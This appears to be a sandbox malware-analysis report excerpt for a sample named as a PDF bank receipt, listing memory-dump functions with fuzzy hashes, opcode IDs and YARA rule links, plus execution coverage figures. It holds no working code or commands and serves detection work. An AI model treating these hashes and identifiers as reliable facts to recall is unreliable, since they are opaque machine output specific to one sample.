                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d2d6e3e4e756750c23068d8824f6e5702c2ec44f0b8f4987d19a1512e2e2af5
                                                                                                                                                          • Instruction ID: da2f182dcebb5168e03147a1a1fb60dd6758d1bee3cec23c67400c969e73215b
                                                                                                                                                          • Opcode Fuzzy Hash: 5d2d6e3e4e756750c23068d8824f6e5702c2ec44f0b8f4987d19a1512e2e2af5
                                                                                                                                                          • Instruction Fuzzy Hash: 1CD1AE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067D8840 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: a2eb14469b5e94802ea70375cdf2fa1e294a60b3d18230ce1d999da5ada3f20e
                                                                                                                                                          • Instruction ID: a71b49d88cc178dc9fb7cb4c741247f2ce962ed39b9bd9730e644a3c20ad0a8e
                                                                                                                                                          • Opcode Fuzzy Hash: a2eb14469b5e94802ea70375cdf2fa1e294a60b3d18230ce1d999da5ada3f20e
                                                                                                                                                          • Instruction Fuzzy Hash: FDD1BE74E01218CFDB54DFA9D984B9DBBB2FF89300F1085A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D4CF0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 34e127f3cb2d5deae4865f10e8e322de3b51c4328170e8fc5ba1b66431ac2d51
                                                                                                                                                          • Instruction ID: a0a3843b2e4937e36af2ac17987c2534a8b8877617010cc68b76780570186e7a
                                                                                                                                                          • Opcode Fuzzy Hash: 34e127f3cb2d5deae4865f10e8e322de3b51c4328170e8fc5ba1b66431ac2d51
                                                                                                                                                          • Instruction Fuzzy Hash: 15D1BE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067D6CE0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 70c5368d0e4c63619662e4411a0481b9a071caf683d4a03debaf6d471f58aee5
                                                                                                                                                          • Instruction ID: 37bbe5d657523dc78725cb0f4df6a3949a07bdf1f0fc4d36cae8c9e9024fe50a
                                                                                                                                                          • Opcode Fuzzy Hash: 70c5368d0e4c63619662e4411a0481b9a071caf683d4a03debaf6d471f58aee5
                                                                                                                                                          • Instruction Fuzzy Hash: 50D1BE74E01218CFDB54DFA9D984B9DBBB2FF89300F2084A9D419AB368DB319985CF51
                                                                                                                                                          Function 067D8CD0 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6e30229c319c7ac7cca3d69b0bd140b811c331ccc9ebcbc20d92279ea354e9ad
                                                                                                                                                          • Instruction ID: d529f952158f3d6440476aef6847a13c92921afa29776fb5b5e41bfdf94d8f73
                                                                                                                                                          • Opcode Fuzzy Hash: 6e30229c319c7ac7cca3d69b0bd140b811c331ccc9ebcbc20d92279ea354e9ad
                                                                                                                                                          • Instruction Fuzzy Hash: 88D1BF74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067DAC88 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 567652ea2d8b7c9da60fc9ed810def1229c92e8d1177a77dd3eaf2270a4bf9cc
                                                                                                                                                          • Instruction ID: 46fc9b48a393d74ee36792f3874aeb156c6e1cceb2f70aa7b6f6603576458893
                                                                                                                                                          • Opcode Fuzzy Hash: 567652ea2d8b7c9da60fc9ed810def1229c92e8d1177a77dd3eaf2270a4bf9cc
                                                                                                                                                          • Instruction Fuzzy Hash: 94D1BF74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D419AB368DB319985CF51
                                                                                                                                                          Function 067D7170 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6e45ca2c180890d0a12f14dff4b0625c8d1f8993b190e98d29625bebecc5bf9f
                                                                                                                                                          • Instruction ID: d1d1e5cb625d98aec03dc191908c7bf9359518836010b32b92c890dd8aae11a2
                                                                                                                                                          • Opcode Fuzzy Hash: 6e45ca2c180890d0a12f14dff4b0625c8d1f8993b190e98d29625bebecc5bf9f
                                                                                                                                                          • Instruction Fuzzy Hash: DBD1BF74E01218CFDB55DFA9C984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067D9160 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9c199abd3136fa016f0069035f67ea056bc48526b8491b452139a0d959d47202
                                                                                                                                                          • Instruction ID: e6b2f4f513dc78302c6adb4730f0f1787b738fd59adffb13aa2b48667f5b273a
                                                                                                                                                          • Opcode Fuzzy Hash: 9c199abd3136fa016f0069035f67ea056bc48526b8491b452139a0d959d47202
                                                                                                                                                          • Instruction Fuzzy Hash: E0D1BF74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D509AB368DB319985CF51
                                                                                                                                                          Function 067DB118 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cbc9dd939f81e4f1d83558a0f38ce054df2049f8173a8a3a923aa87fd1743799
                                                                                                                                                          • Instruction ID: 5ac6e3984ada3db8cb3b4e0b0f58a24efdbd91b1e2226687bad4059daa204ddd
                                                                                                                                                          • Opcode Fuzzy Hash: cbc9dd939f81e4f1d83558a0f38ce054df2049f8173a8a3a923aa87fd1743799
                                                                                                                                                          • Instruction Fuzzy Hash: 82D1BF74E01218CFDB55DFA9D984B9DBBB2FF89300F2084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067DD108 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: cda6efda8c780683b86a379a7e3401853eddb9dc859a5c5777431c14e5806850
                                                                                                                                                          • Instruction ID: 058b2ddfa4f43df7fcd67a950799013b1a8f78930eb9d77e27a6e3012213044a
                                                                                                                                                          • Opcode Fuzzy Hash: cda6efda8c780683b86a379a7e3401853eddb9dc859a5c5777431c14e5806850
                                                                                                                                                          • Instruction Fuzzy Hash: AED1BE74E01218CFDB54DFA9D984B9DBBB2FF89300F1084A9D409AB368DB319A85CF51
                                                                                                                                                          Function 067DB5A8 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c74c0a704068d9edae4bd56b8812b328b2a61ecd69e1d2e42d5ec8fe7a28d661
                                                                                                                                                          • Instruction ID: 86d217fb5a73ffba4d7b840c921a0c885d71ea0b4ddf1d2c579b0287badecaf4
                                                                                                                                                          • Opcode Fuzzy Hash: c74c0a704068d9edae4bd56b8812b328b2a61ecd69e1d2e42d5ec8fe7a28d661
                                                                                                                                                          • Instruction Fuzzy Hash: B1D1BE74E01218CFDB54DFA9D984BADBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067DD598 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0d1cee6d6ea6d9dd6dd5d988a3d2bb9f6998194bc16ba15f2a7e1c4dc5837f41
                                                                                                                                                          • Instruction ID: 5fef2c7e2cb2c37849b693da98ff27bfacf7c6f7b49e676d54eb57098dfa1ec6
                                                                                                                                                          • Opcode Fuzzy Hash: 0d1cee6d6ea6d9dd6dd5d988a3d2bb9f6998194bc16ba15f2a7e1c4dc5837f41
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD1CF74E01218CFDB55DFA9D984BADBBB2FF89300F1084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067D3190 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 44ec5b493a6e0beb5e0d34e46f8be00b2f859890b6899488d86877d0ba5f3125
                                                                                                                                                          • Instruction ID: 93e463cc5d819df39f848648b682bbd54198773b6c983d6eb71e7a114286eb20
                                                                                                                                                          • Opcode Fuzzy Hash: 44ec5b493a6e0beb5e0d34e46f8be00b2f859890b6899488d86877d0ba5f3125
                                                                                                                                                          • Instruction Fuzzy Hash: 04D1CF74E01218CFDB55DFA9C984BADBBB2FF89300F1084A9D409AB368DB359985CF51
                                                                                                                                                          Function 067D5180 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 34dd94a40e7da13f65e455dbcfb73e2510a48e07c7e16e729cb8e890a2a07d38
                                                                                                                                                          • Instruction ID: f9414a13e1bfce0a4e682f3368aa31163952d868714d7ef7487a5337d08deee9
                                                                                                                                                          • Opcode Fuzzy Hash: 34dd94a40e7da13f65e455dbcfb73e2510a48e07c7e16e729cb8e890a2a07d38
                                                                                                                                                          • Instruction Fuzzy Hash: 5BD1B074E01218CFDB55DFA9D944B9DBBB2FF89300F1084A9D409AB368DB319985CF51
                                                                                                                                                          Function 067D95F0 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 55350e376b3ae34cb4f1494d453909fc24fe42f6c52f4066feb82b248e36f26d
                                                                                                                                                          • Instruction ID: 769bec8c8aa102332f102dbe6fdc89b6eef97156ff918d6e1beebf0c4312c6de
                                                                                                                                                          • Opcode Fuzzy Hash: 55350e376b3ae34cb4f1494d453909fc24fe42f6c52f4066feb82b248e36f26d
                                                                                                                                                          • Instruction Fuzzy Hash: E9C19E74E01218CFDB54DFA9C984BADBBB2FF89300F1094A9D409AB365DB359A85CF50
                                                                                                                                                          Function 055CE708 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 9be72acd01ae9b88ff17264cefc55db1da33c2cc0b0fcbe7647a8b29446eee06
                                                                                                                                                          • Instruction ID: 10f6d349529a16497e383070672bd7d445225be491d03f34f2cccce4f8046e6d
                                                                                                                                                          • Opcode Fuzzy Hash: 9be72acd01ae9b88ff17264cefc55db1da33c2cc0b0fcbe7647a8b29446eee06
                                                                                                                                                          • Instruction Fuzzy Hash: D0C1BF74E01218CFDB54DFA9C984BADBBB2FF89300F1081A9D409AB364DB359A85CF50
                                                                                                                                                          Function 055CE178 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: ed2d1e4fcb073dc2930373bf161d2a5a612996b1079d2920ec9a08b484a3a0c9
                                                                                                                                                          • Instruction ID: 9fd753104f52823fc5676ee934fa0dfd77269c664e8a14989c6a2b924828e5f0
                                                                                                                                                          • Opcode Fuzzy Hash: ed2d1e4fcb073dc2930373bf161d2a5a612996b1079d2920ec9a08b484a3a0c9
                                                                                                                                                          • Instruction Fuzzy Hash: 53C1B074E01218CFDB54DFA9D984BADBBB2FF89300F1091A9D409AB364DB359A85CF50
                                                                                                                                                          Function 055CEFB8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6902d05945fce0f8e80200607e33ce727235dc8d0609639072f289e509dfce91
                                                                                                                                                          • Instruction ID: ffddf59359347393d0ac16d9b291edcf2410a581f8008419ea4dafc6fb03b0f1
                                                                                                                                                          • Opcode Fuzzy Hash: 6902d05945fce0f8e80200607e33ce727235dc8d0609639072f289e509dfce91
                                                                                                                                                          • Instruction Fuzzy Hash: 15C1A074E01218CFDB54DFA5C984BADBBB2FF89300F1080A9D419AB364DB359A85CF50
                                                                                                                                                          Function 055CEB60 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3412b70d979101031355ab4494648106dcafe5f1c615b9a98d0506a64a6679bf
                                                                                                                                                          • Instruction ID: 88e3854efc3e0a84c672b330d95d33fc8633b288ae1862dca48939310551c2d2
                                                                                                                                                          • Opcode Fuzzy Hash: 3412b70d979101031355ab4494648106dcafe5f1c615b9a98d0506a64a6679bf
                                                                                                                                                          • Instruction Fuzzy Hash: 5DC1A074E01218CFDB54DFA5D984BADBBB2FF89300F1090A9D409AB364DB359A85CF50
                                                                                                                                                          Function 055CD470 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 4e5829b72683c144f23d233b964e0fc69535fe7da2ff926c489e93eea9f4a0b9
                                                                                                                                                          • Instruction ID: 13ca83bf6a7f8bd9a25124775a8142282d9795ca710d6bb86d9ab50212bf0c43
                                                                                                                                                          • Opcode Fuzzy Hash: 4e5829b72683c144f23d233b964e0fc69535fe7da2ff926c489e93eea9f4a0b9
                                                                                                                                                          • Instruction Fuzzy Hash: 87C1AF74E01218CFDB54DFA5D984BADBBB2FF89300F2080A9D419AB364DB359A85CF50
                                                                                                                                                          Function 055CF410 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 356701225df4b70b8ed17185d5ebdffc171c7d95e40817335eb6bdeab7c7f288
                                                                                                                                                          • Instruction ID: b2965737b44ecb84b38b9dd49310517ed063861df40514ed66907c169a2c5447
                                                                                                                                                          • Opcode Fuzzy Hash: 356701225df4b70b8ed17185d5ebdffc171c7d95e40817335eb6bdeab7c7f288
                                                                                                                                                          • Instruction Fuzzy Hash: F0C1B074E01218CFDB54DFA5D984BADBBB2FF89300F1091A9D409AB364DB359A85CF50
                                                                                                                                                          Function 055CDD20 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 741c1b1ee119a5b66e4d87bc18a7a0b6e2ca7c699d9bed24d48515cfa3ccff3f
                                                                                                                                                          • Instruction ID: d4faf3d43df22e8215186c2a76dab370cdf157e95e885f06b5d3131542f8ecfc
                                                                                                                                                          • Opcode Fuzzy Hash: 741c1b1ee119a5b66e4d87bc18a7a0b6e2ca7c699d9bed24d48515cfa3ccff3f
                                                                                                                                                          • Instruction Fuzzy Hash: 83C1AF74E01218CFDB54DFA9D984BADBBB2FF89300F1090A9D409AB364DB359A85CF50
                                                                                                                                                          Function 055CD8C8 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4161874317.00000000055C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_55c0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 64ee17c9bde122164f8a7d8ed0d2eb712f263d780a34c21e838e473917fa1d5e
                                                                                                                                                          • Instruction ID: 5c85f3dd96a70955a360b73dcfd26ddfc556ab5a1b8214a6eadf37e223569a9c
                                                                                                                                                          • Opcode Fuzzy Hash: 64ee17c9bde122164f8a7d8ed0d2eb712f263d780a34c21e838e473917fa1d5e
                                                                                                                                                          • Instruction Fuzzy Hash: 1FC1AF74E01218CFDB54DFA9C984BADBBB2FF89300F1090A9D419AB365DB359A85CF50
                                                                                                                                                          Function 067D2AF0 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 7045b2b59ed35671dbee0384a42eeacf89f12c348d0303ef931520c38e062fc2
                                                                                                                                                          • Instruction ID: 053d1809fb2fc2402c6a02cb54a65b062cf7ec1aa8548f83b84a5f8a4bacff0f
                                                                                                                                                          • Opcode Fuzzy Hash: 7045b2b59ed35671dbee0384a42eeacf89f12c348d0303ef931520c38e062fc2
                                                                                                                                                          • Instruction Fuzzy Hash: 98410174D022098FCB44CFA8C594BEEBBF1AF49300F1485A9E410BB3A1E7788A41CF94
                                                                                                                                                          Function 067D2B00 Relevance: .1, Instructions: 93COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4164182185.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_67d0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 61f6f964fbe2c8094110276063f644514382b3c1f5e7c26dae3e9c34dab1695f
                                                                                                                                                          • Instruction ID: 2cabd516dbf83535fa6f053bd483f25dd5e6c02dc7c3db903d13b16a32a718a4
                                                                                                                                                          • Opcode Fuzzy Hash: 61f6f964fbe2c8094110276063f644514382b3c1f5e7c26dae3e9c34dab1695f
                                                                                                                                                          • Instruction Fuzzy Hash: 4641BFB4D022199FCB44DFA8D594BEEBBF1AF49300F1454A9E414B73A1E7789A40CF94
                                                                                                                                                          Function 00EB6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000006.00000002.4149327795.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_6_2_eb0000_rDEKONT-1_16_2025__75kb__pdf.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: \;kq$\;kq$\;kq$\;kq
                                                                                                                                                          • API String ID: 0-2874455797
                                                                                                                                                          • Opcode ID: 8ca419e1785e8822135d97a919b225b582b976effba2def3d5f192114195a9a3
                                                                                                                                                          • Instruction ID: f4e746891834a0d145ceb2251674b20111b44cd6dea9873340919053611d95a5
                                                                                                                                                          • Opcode Fuzzy Hash: 8ca419e1785e8822135d97a919b225b582b976effba2def3d5f192114195a9a3
                                                                                                                                                          • Instruction Fuzzy Hash: 8E01DB317402048FCB248E2CC550AA733EABFD8768736507AE505EB3B8DA39EC418780

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:13.6%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:254
                                                                                                                                                          Total number of Limit Nodes:10
